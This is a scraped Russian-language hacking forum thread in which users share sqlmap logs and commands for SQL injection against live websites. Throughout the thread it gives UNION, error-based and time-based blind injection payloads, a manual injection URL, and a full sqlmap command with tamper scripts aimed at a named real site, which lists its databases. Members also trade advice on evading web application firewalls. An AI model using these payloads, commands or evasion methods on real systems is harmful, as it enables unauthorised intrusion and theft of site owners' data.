,NULL,NULL,NULL,CONCAT(0x716a707171,0x565a7070474f 77495945716a52566b686252457372
674b776e694f6f6877554c4b564f4b6a4c464a,0x716a7a707 1)-- -
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY]-- -
---
[06:15:30] [INFO] testing MySQL
[06:15:30] [DEBUG] performed 0 queries in 0.02 seconds
[06:15:30] [INFO] confirming MySQL
[06:15:30] [DEBUG] performed 0 queries in 0.00 seconds
[06:15:30] [PAYLOAD] -8917' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x716a7a707
1)-- -
[06:15:32] [DEBUG] turning off NATIONAL CHARACTER casting
[06:15:32] [PAYLOAD] -8379' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x716a7a707
1)-- -
[06:15:34] [DEBUG] performed 2 queries in 4.32 seconds
[06:15:34] [DEBUG] performed 0 queries in 0.01 seconds
[06:15:34] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[06:15:34] [INFO] fetching tables for database: 'DB'
[06:15:34] [PAYLOAD] -9852' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,JSON_ARRAYAGG(CONCAT_WS(0x6f6b6c6a646f,table_ name)),0x716a7a7071) FROM INFO
RMATION_SCHEMA.TABLES WHERE table_schema IN (0x70617266756d)-- -
[06:15:37] [PAYLOAD] -6604' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716a7a7071) FROM INFORMATION
_SCHEMA.TABLES WHERE table_schema IN (0x70617266756d)-- -
[06:15:40] [WARNING] the SQL query provided does not return any output
[06:15:40] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[06:15:40] [PAYLOAD] -6180' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,JSON_ARRAYAGG(CONCAT_WS(0x6f6b6c6a646f,table_ name)),0x716a7a7071) FROM mysq
l.innodb_table_stats WHERE database_name IN (0x70617266756d)-- -
[06:15:43] [PAYLOAD] -8023' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716a7a7071) FROM mysql.innod
b_table_stats WHERE database_name IN (0x70617266756d)-- -
[06:15:45] [WARNING] the SQL query provided does not return any output
[06:15:45] [INFO] fetching number of tables for database 'DB'
[06:15:45] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
1,1))>51-- ZVRv
[06:15:48] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
1,1))>48-- ZVRv
[06:15:51] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
1,1))>9-- ZVRv
[06:15:52] [INFO] retrieved:
[06:15:52] [DEBUG] performed 3 queries in 6.77 seconds
multi-threading is considered unsafe in time-based data retrieval. Are you sure
of your choice (breaking warranty) [y/N] N
[06:15:52] [DEBUG] used the default behavior, running in batch mode
[06:15:52] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
ES WHERE table_schema=0x70617266756d),1,1))>51,0,5)))))HoOT)-- oDuA
[06:15:52] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..................... (done)
[06:16:00] [CRITICAL] considerable lagging has been detected in connection respo
nse(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or
more)
[06:16:01] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
ES WHERE table_schema=0x70617266756d),1,1))>48,0,5)))))HoOT)-- oDuA
[06:16:01] [WARNING] it is very important to not stress the network connection d
uring usage of time-based payloads to prevent potential disruptions
[06:16:02] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
ES WHERE table_schema=0x70617266756d),1,1))>9,0,5)))))HoOT)-- oDuA
[06:16:03] [INFO] retrieved:
[06:16:03] [DEBUG] performed 3 queries in 11.19 seconds
[06:16:03] [WARNING] unable to retrieve the number of tables for database 'parfu
m'
[06:16:03] [INFO] fetching number of tables for database 'DB'
[06:16:03] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
1,1))>51-- LERK
[06:16:05] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
1,1))>48-- LERK
[06:16:06] [DEBUG] turning off reflection removal mechanism (for optimization pu
rposes)
[06:16:06] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
1,1))>9-- LERK
[06:16:07] [INFO] retrieved:
[06:16:07] [DEBUG] performed 3 queries in 3.66 seconds
[06:16:07] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
s WHERE database_name=0x70617266756d),1,1))>51,0,5)))))FEKR)-- xICj
[06:16:08] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
s WHERE database_name=0x70617266756d),1,1))>48,0,5)))))FEKR)-- xICj
[06:16:09] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
s WHERE database_name=0x70617266756d),1,1))>9,0,5)))))FEKR)-- xICj
[06:16:10] [INFO] retrieved:
[06:16:10] [DEBUG] performed 3 queries in 3.23 seconds
[06:16:10] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
[06:16:10] [DEBUG] used the default behavior, running in batch mode
No tables found





Code:
[06:15:40] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'

попробуй в начале с этого + уже имеющиеся тамперы, в том числе на select. Указывай verbose 3 и смотри

msk_smail said:
↑ (https://antichat.live/posts/4477185/)

Code:
[06:15:40] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'

попробуй в начале с этого + уже имеющиеся тамперы, в том числе на select. Указывай verbose 3 и смотри


не помогло(

brown said:
↑ (https://antichat.live/posts/4477199/)
не помогло(


можно использовать сразу связку из нескольких тамперов + используй --prefix="111'/*!40222" --suffix="*/!'"

если не помогает, то определи какая waf и попробуй найти как вариант реальный ip сайта

если и это не выходит то придется вручную писать тампер

msk_smail said:
↑ (https://antichat.live/posts/4477201/)
можно использовать сразу связку из нескольких тамперов + используй --prefix="111'/*!40222" --suffix="*/!'"
если не помогает, то определи какая waf и попробуй найти как вариант реальный ip сайта
если и это не выходит то придется вручную писать тампер


можно разьеснительную бригаду по поводу префикс суффикс ?

[08:04:48] [WARNING] there is a possibility that the target (or WAF/IPS) is drop

ping 'suspicious' requests

Как можно обойти?

[08:04:48] [CRITICAL] connection timed out to the target URL. sqlmap is going to

retry the request(s)

[08:06:18] [CRITICAL] connection timed out to the target URL

[08:06:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to

retry the request(s)

[08:08:19] [CRITICAL] connection timed out to the target URL

[08:08:19] [INFO] URI parameter '#1*' appears to be 'OR boolean-based blind - WH

ERE or HAVING clause (NOT)' injectable (with --string="write")

[08:08:19] [WARNING] in OR boolean-based injection cases, please consider usage

of switch '--drop-set-cookie' if you experience any problems during data retriev

al

[08:08:19] [INFO] checking if the injection point on URI parameter '#1*' is a fa

lse positive

[08:08:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to

retry the request(s)

[08:10:19] [CRITICAL] connection timed out to the target URL

[08:10:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to

retry the request(s)

[08:12:19] [CRITICAL] connection timed out to the target URL

[08:12:19] [WARNING] false positive or unexploitable injection point detected

[08:12:19] [WARNING] URI parameter '#1*' does not seem to be injectable

ваф не дает прокрутить скулю

Доброго дня! К примеру знаю что в БД есть строка с почтой admin@admin.com (mailto:admin@admin.com), но имя таблицы и колонки не знаю т.к. они имеют рандомные названия типа "dfdwydponefdxb". Как выполнить поиск по всей БД и найти в какой таблице есть запись с admin@admin.com (mailto:admin@admin.com)?

Доброго вечера, ребята. Актуальный вопрос, может есть готовый тампер под - Imunify360 (CloudLinux) waf, либо может взять что-то из готового и переписать?

Уж один сладкий вариант подвернулся))

Всех с наступающим Новым 2022 Годом.

Code:
Parameter: JSON #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (UPDATEXML)
Payload: {"username":"test' AND UPDATEXML(7256,CONCAT(0x2e,0x716a7a7071,(SEL
ECT (ELT(7256=7256,1))),0x71627a7671),5155) AND 'kFiU'='kFiU","password":"test"}

Vector: AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[D
ELIMITER_STOP]'),[RANDNUM1])
---
[12:20:48] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.34
back-end DBMS: MySQL >= 5.1
[12:20:48] [INFO] fetching database names
[12:20:48] [PAYLOAD] test' AND UPDATEXML(3717,CONCAT(0x2e,0x716a7a7071,(SELECT C
OUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA),0x71627a7671),8364) AND 'Bbs
S'='BbsS
[12:20:49] [WARNING] the SQL query provided does not return any output
[12:20:49] [INFO] falling back to current database
[12:20:49] [INFO] fetching current database
[12:20:49] [PAYLOAD] test' AND UPDATEXML(9975,CONCAT(0x2e,0x716a7a7071,(MID((DAT
ABASE()),1,22)),0x71627a7671),9057) AND 'rvrx'='rvrx
[12:20:49] [DEBUG] performed 1 query in 0.65 seconds
[12:20:49] [CRITICAL] unable to retrieve the database names

Ребят помогите как запихнуть в sqlmap

есть бага site.de/index.php?view_id=-11'+/*!12345UNION*/+/*!12345SELECT*/+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+

работает название бд выводит но sqlmap не видит что линк уязвим пробовал и темперы разные тупо 403 выводи в логе sqlmap

руками получается вывести version 10.2.43-MariaDB-cll-lve получается вывезти user

exe-world said:
↑ (https://antichat.live/posts/4495939/)
Ребят помогите как запихнуть в sqlmap
есть бага site.de/index.php?view_id=-11'+/*!12345UNION*/+/*!12345SELECT*/+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+
работает название бд выводит но sqlmap не видит что линк уязвим пробовал и темперы разные тупо 403 выводи в логе sqlmap
руками получается вывести version 10.2.43-MariaDB-cll-lve получается вывезти user


очень похоже на модсекьюрити, надо тампер либо искать либо перепилить готовые, тут тема обхода /threads/425295/ (https://antichat.live/threads/425295/)

exe-world said:
↑ (https://antichat.live/posts/4495939/)
Ребят помогите как запихнуть в sqlmap
есть бага site.de/index.php?view_id=-11'+/*!12345UNION*/+/*!12345SELECT*/+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+
работает название бд выводит но sqlmap не видит что линк уязвим пробовал и темперы разные тупо 403 выводи в логе sqlmap
руками получается вывести version 10.2.43-MariaDB-cll-lve получается вывезти user


what MYSQL version ?

https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3

eminlayer7788 said:
↑ (https://antichat.live/posts/4495958/)
what MYSQL version ?
https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3


version 10.2.43-MariaDB-cll-lve

karkajoi said:
↑ (https://antichat.live/posts/4495943/)
очень похоже на модсекьюрити, надо тампер либо искать либо перепилить готовые, тут тема обхода
/threads/425295/ (https://antichat.live/threads/425295/)


Попробовал как у автора from {f information_schema.tables} блочит 403 выдает и все

просто '+/*!12345UNION*/+/*!12345SELECT*/+1,{f version()},3,4,5,6,7,8,9,10,11,12,13,14,15,16--+ работает версия выводится

Пробовал в ручную как у автора тут

Тоже тупо блок может это не модсекьюрите?хотя конечно очень похоже

exe-world said:
↑ (https://antichat.live/posts/4495962/)
version 10.2.43-MariaDB-cll-lve


test versionedkeywords,between,unionalltounion tamper scripts together

eminlayer7788 said:
↑ (https://antichat.live/posts/4495974/)
test versionedkeywords,between,unionalltounion tamper scripts together


[13:53:45] [CRITICAL] all tested parameters do not appear to be injectable

[13:53:45] [WARNING] HTTP error codes detected during run:

403 (Forbidden) - 3438 times, 501 (Not Implemented) - 12 times

К сожалению tamper не помог

exe-world said:
↑ (https://antichat.live/posts/4495978/)
[13:53:45] [CRITICAL] all tested parameters do not appear to be injectable
[13:53:45] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 3438 times, 501 (Not Implemented) - 12 times
К сожалению tamper не помог


send me your target link via pm

exe-world said:
↑ (https://antichat.live/posts/4495939/)
Ребят помогите как запихнуть в sqlmap
есть бага site.de/index.php?view_id=-11'+/*!12345UNION*/+/*!12345SELECT*/+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+
работает название бд выводит но sqlmap не видит что линк уязвим пробовал и темперы разные тупо 403 выводи в логе sqlmap
руками получается вывести version 10.2.43-MariaDB-cll-lve получается вывезти user



.SpoilerTarget" type="button">Spoiler: sqlmap payload
python3 sqlmap.py -u "https://mkeducationalsupplies.com.au/viewproduct.php?productid=364*" --level=4 --risk=3 --random-agent --batch --dbs --tamper=between,modsecurityversioned,randomcase,spa ce2comment,unionalltounion --fresh-queries

available databases [1]:

mkeducat_books2019

What is wrong in request ?

python3 sqlmap.py -u "http://stat.com/service.php" -p 'type' --risk="3" --level="3" --method="POST" --data='{"appFrom":"","appId":"","appName":"City","module":"install-broadcast","op":"setup","packageAppName":"ar.ity","position":"","type":"0","action":"postyyt","channelId":"cdy5e1e1a","mac":"F4:9y3:9F:F8:2A:80","marketVersion":"launcher_5.0.8","userName":"-1","version":"6.2.1"}' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36" --headers="Host:stat.com\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nConnection:Close\nContent-Type:application/json;charset=UTF-8" --dbms="MySQL" --batch

[05:55:43] [CRITICAL] all testable parameters you provided are not present within the given request data #5108


P.S also checked "type" and 'type' in -p and in request data

P.S.S sqlmap -r request.txt doesn't work in this case ( and this payload workable, because other scanner can execute sql query with this payload